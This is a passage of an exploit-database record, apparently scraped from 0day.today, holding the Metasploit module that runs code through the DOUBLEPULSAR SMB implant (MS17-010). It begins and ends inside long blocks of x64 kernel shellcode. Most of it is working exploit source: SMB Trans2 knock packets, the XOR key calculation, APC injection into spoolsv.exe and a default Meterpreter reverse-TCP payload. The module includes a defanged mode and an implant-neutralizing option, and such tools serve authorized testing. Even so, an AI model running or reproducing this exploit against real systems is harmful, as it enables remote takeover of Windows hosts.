\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-24] #"}, "lastseen": "2021-09-24T00:15:39", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "6d826972683f0678fb3fe5e6022cbd18", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-25T00:20:17", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", 
"EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-25T00:20:17", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-25T00:20:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module 
requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" 